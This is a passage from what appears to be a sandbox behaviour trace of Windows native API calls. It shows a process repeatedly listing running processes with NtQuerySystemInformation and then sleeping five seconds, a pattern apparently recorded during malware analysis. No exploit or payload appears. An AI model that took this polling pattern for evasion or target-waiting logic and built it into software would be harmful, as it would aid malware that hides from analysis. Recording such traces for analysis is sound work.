NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0232.801] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0232.802] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0232.803] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0232.803] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0232.926] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.926] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0232.928] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0232.929] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0232.930] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0232.930] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0232.931] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0233.045] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.046] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0233.048] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0233.048] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0233.049] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0233.049] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0233.049] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0233.152] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.153] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0233.154] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0233.154] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0233.155] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0233.155] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0233.155] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0233.255] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.257] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0233.258] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0233.258] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0233.260] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0233.260] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0233.260] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0233.360] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.361] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0233.362] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0233.363] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0233.364] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0233.364] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0233.364] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0233.486] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.487] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0233.488] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0233.488] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0233.489] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0233.489] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0233.490] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0233.595] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.596] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0233.597] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0233.598] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0233.599] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0233.599] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0233.599] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0233.732] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.733] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0233.734] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0233.735] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0233.736] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0233.736] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0233.736] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0233.919] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.920] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0233.921] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0233.922] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0233.923] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0233.923] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0233.923] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0234.043] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.044] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0234.046] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0234.047] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0234.048] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0234.048] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0234.048] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0234.148] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.149] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0234.150] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0234.151] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0234.151] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0234.152] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0234.152] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0234.261] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.261] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0234.263] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0234.263] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0234.264] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0234.264] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0234.264] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0234.362] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.363] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0234.366] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0234.366] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0234.367] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0234.367] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0234.367] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0234.482] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.483] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0234.484] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0234.484] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0234.485] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0234.486] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0234.486] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0234.585] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.586] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0234.587] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0234.588] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0234.588] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0234.589] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0234.589] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0234.687] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.687] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0234.689] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0234.689] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0234.690] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0234.690] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0234.690] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0234.789] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.790] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0234.791] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0234.792] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0234.792] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0234.793] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0234.793] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0234.892] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.893] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0234.902] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0234.902] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0234.903] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0234.903] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0234.903] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0235.004] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.005] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0235.006] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0235.007] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0235.007] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0235.008] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0235.008] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0235.107] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.108] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0235.109] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0235.109] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0235.110] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0235.111] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, 